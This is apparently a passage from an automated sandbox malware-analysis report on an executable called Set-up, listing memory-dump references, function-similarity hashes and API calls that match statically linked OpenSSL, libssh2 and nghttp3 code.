                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: strcpystrlen$memset
                          • String ID: BUF_MEM_grow_clean$crypto/buffer/buffer.c
                          • API String ID: 2970985887-4138242688
                          • Opcode ID: 39fcc3a8ee850dde64f28933cd5b78e81271b37d964224679aa1d5f8601480b9
                          • Instruction ID: 325cba61fbb2615d5008ddfa25284e5995008a0bedeb0b09e4aeab26b1259b9a
                          • Opcode Fuzzy Hash: 39fcc3a8ee850dde64f28933cd5b78e81271b37d964224679aa1d5f8601480b9
                          • Instruction Fuzzy Hash: 2D310B71764308ABDB10BE24DC82F3A7BD9DB41714F088158FA8D9F2D7E674D8489671
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00A90646
                            • Part of subcall function 00B4F340: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,00A900B0,?,?,00000000,00000000,?), ref: 00B4F35D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _time64strlen
                          • String ID: Attempt to set SFTP stats failed: %s$Unknown error in libssh2$vssh/libssh2.c
                          • API String ID: 3014104814-2439779272
                          • Opcode ID: 5af0834c87fd625940554b3e30c725dd1a9ab64812ccf5014024898559c0a396
                          • Instruction ID: 167b47d0036eae520eb3a5bd920c4d635ea2f64c6995a7d60187a58fdf510533
                          • Opcode Fuzzy Hash: 5af0834c87fd625940554b3e30c725dd1a9ab64812ccf5014024898559c0a396
                          • Instruction Fuzzy Hash: 6B31DFB5B04201AFD705AF28D881B9AF7F4BF89324F058568F5584B292E371BA149B92
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00A90594
                            • Part of subcall function 00B4EE30: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00B4EE4F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _time64strlen
                          • String ID: Unknown error in libssh2$mkdir command failed: %s$vssh/libssh2.c
                          • API String ID: 3014104814-3060469362
                          • Opcode ID: 72bb0393760c27dad3fd9d606e5bbff0409ae2d19b7cbfa59f4be88731138fd0
                          • Instruction ID: 7378c961abb347696bc816ab9c689ac9da7c3db968f58e74f1a572352b70dbcd
                          • Opcode Fuzzy Hash: 72bb0393760c27dad3fd9d606e5bbff0409ae2d19b7cbfa59f4be88731138fd0
                          • Instruction Fuzzy Hash: FA2194B5B04201AFD701DF28D881A5AF7F8BF48314F158568F55887352E371EE149B92
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,00BD71DD,00000000,?,?), ref: 00BD44AC
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000,?,?,?,?,?), ref: 00BD44FF
                            • Part of subcall function 00C17220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C17262
                            • Part of subcall function 00C17220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C17285
                            • Part of subcall function 00C17220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C172C5
                            • Part of subcall function 00C17220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C172E8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: strlen$strcpy$memcpy
                          • String ID: ASN1_STRING_set$crypto/asn1/asn1_lib.c
                          • API String ID: 1223016426-1431402185
                          • Opcode ID: 8606d9f5acaa1413d12d381320ea2260acfdc7775fab93e6594b1df41374cdde
                          • Instruction ID: 48d0cc48b7c68d96ff4daf07ecda55cd194cac5da033fc1bc5b1acd7797c6f49
                          • Opcode Fuzzy Hash: 8606d9f5acaa1413d12d381320ea2260acfdc7775fab93e6594b1df41374cdde
                          • Instruction Fuzzy Hash: 7211297160421457D7216D249882B6BF3D8DB52714F15019AFD596B3C2FB71DC40A7F2
                          APIs
                          • WideCharToMultiByte.KERNEL32 ref: 00AA4969
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00AA4976
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00AA4994
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00AA49A3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$freemalloc
                          • String ID:
                          • API String ID: 2605342592-0
                          • Opcode ID: 0f2f64b870b8244e792f5704f5e081a66b72b8a8fd7ce564048ef1db0d6d270e
                          • Instruction ID: 9d331d9ed6eb365e70ed2a286a257f5e1717bb8fc574a1725a10747f96b07ff1
                          • Opcode Fuzzy Hash: 0f2f64b870b8244e792f5704f5e081a66b72b8a8fd7ce564048ef1db0d6d270e
                          • Instruction Fuzzy Hash: CD01F2B16043056AF3206B639C01B37B7ACEBC6B60F004538F9849B2C0EBB098158763
                          APIs
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - pbuf->last) == len,nghttp3_qpack.c,00000978), ref: 00B0C4E7
                          Strings
                          • (size_t)(p - pbuf->last) == len, xrefs: 00B0C4E2
                          • nghttp3_qpack.c, xrefs: 00B0C4DD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _assert
                          • String ID: (size_t)(p - pbuf->last) == len$nghttp3_qpack.c
                          • API String ID: 1222420520-3384106985
                          • Opcode ID: 5402d79c505a91431200ebcb1706dd8a63d240466ea50ba89d12aed02a593985
                          • Instruction ID: f40eea46970d04a983c141f8ce48b9ee5d0c7eeb76c7a85f54f756efb01d9ebd
                          • Opcode Fuzzy Hash: 5402d79c505a91431200ebcb1706dd8a63d240466ea50ba89d12aed02a593985
                          • Instruction Fuzzy Hash: DB81B371A083009FD7189F2CC89072ABBD2EB99714F1487BCE9998B3D2D775DC488786
                          APIs
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - rbuf->last) == len,nghttp3_qpack.c,000004D0,?,?,?,?,?,?,00B0B434,?,?,00000000,00000000,?,?), ref: 00B0C68A
                          Strings
                          • (size_t)(p - rbuf->last) == len, xrefs: 00B0C685
                          • nghttp3_qpack.c, xrefs: 00B0C680
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _assert
                          • String ID: (size_t)(p - rbuf->last) == len$nghttp3_qpack.c
                          • API String ID: 1222420520-2159148421
                          • Opcode ID: 9d31485e33c8c82a40a303ebe490e5f5cfa640335f397dfc72a6d264575234d4
                          • Instruction ID: 5982de603f19adec88a1f757626889d614cc4e99b36baa6e872bff3ff913cd21
                          • Opcode Fuzzy Hash: 9d31485e33c8c82a40a303ebe490e5f5cfa640335f397dfc72a6d264575234d4
                          • Instruction Fuzzy Hash: BB41F5757082005FD7099B28D89076ABFD2EFD9314F1886BCE889CB3D6DA36DD058781
                          APIs
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len,nghttp3_qpack.c,00000EB7,?,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 00B127D1
                          Strings
                          • nghttp3_qpack.c, xrefs: 00B127C7
                          • nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len, xrefs: 00B127CC
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _assert
                          • String ID: nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len$nghttp3_qpack.c
                          • API String ID: 1222420520-645767172
                          • Opcode ID: a3278af96907b8b8831d03e63b937abc923cc84e83db5b6a0475235b8a6c792a
                          • Instruction ID: 7847596122e5d09b8c16f2c862c27be9ebac21f7c91ad46889abcb6f16e95970
                          • Opcode Fuzzy Hash: a3278af96907b8b8831d03e63b937abc923cc84e83db5b6a0475235b8a6c792a
                          • Instruction Fuzzy Hash: A251D675B043048FD704AF28D880B6AB7E6EB88314F4946BCEC989B3C2EA35DD558B51
                          APIs
                          • _time64.API-MS-WIN-CRT-TIME-L1-1-0(?,00000000,00AD836A,?,?,0000012C,000000FF), ref: 00C549BA
                            • Part of subcall function 00C17220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C17262
                            • Part of subcall function 00C17220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C17285
                            • Part of subcall function 00C17220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C172C5
                            • Part of subcall function 00C17220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C172E8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: strcpystrlen$_time64
                          • String ID: OCSP_check_validity$crypto/ocsp/ocsp_cl.c
                          • API String ID: 3821555430-713967112
                          • Opcode ID: 037fd0db763d9262ab46e810310fb86448b3e610fd6201788bde1b6f2a41c35e
                          • Instruction ID: a5447ff8c730185c6d686ee0b171f81e9d9aa115e0cece3a95965660361154a1
                          • Opcode Fuzzy Hash: 037fd0db763d9262ab46e810310fb86448b3e610fd6201788bde1b6f2a41c35e
                          • Instruction Fuzzy Hash: CC41587AF48310B7DB007A21EC42F5F37668F81768F094438FD0C5B382E575E995A2A6
                          APIs
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E,?,?,?,?,?,?,?), ref: 00B0468C
                          Strings
                          • nghttp3_conn.c, xrefs: 00B04682
                          • tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 00B04687
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _assert
                          • String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
                          • API String ID: 1222420520-4133914617
                          • Opcode ID: bcbe23efd7322e5c740c821cd29636c4fc13bba49914b2586eb5e0f0f2d4640e
                          • Instruction ID: 095836de88d2df7b44dfa603dd68bb87543b4d3aa6bda4b035b06807b7805a3f
                          • Opcode Fuzzy Hash: bcbe23efd7322e5c740c821cd29636c4fc13bba49914b2586eb5e0f0f2d4640e
                          • Instruction Fuzzy Hash: 9331F4716003006FD210DA29EC85FAB7BD8EF86369F0406B9FA58872C2E731E814C7A1
                          APIs
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E), ref: 00B044B7
                          Strings
                          • nghttp3_conn.c, xrefs: 00B044AD
                          • tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 00B044B2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _assert
                          • String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
                          • API String ID: 1222420520-4133914617
                          • Opcode ID: 3f9b7512897ef36198c8b96cc63e43d34c211d5b1b7b34bc42dd9c31c5882ba4
                          • Instruction ID: c2b03ae9fdfccf73303ae23f0cf9b8e537214e15fb83df217e931cfc32513e44
                          • Opcode Fuzzy Hash: 3f9b7512897ef36198c8b96cc63e43d34c211d5b1b7b34bc42dd9c31c5882ba4
                          • Instruction Fuzzy Hash: 6A21F2B21007016BEB105B66DC45F9B3BDEDF84365F0404A4FA18C62A3EB36D4288761
                          APIs
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00DDA161
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00DDA2D1
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00DDA3EC
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00DDA499
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
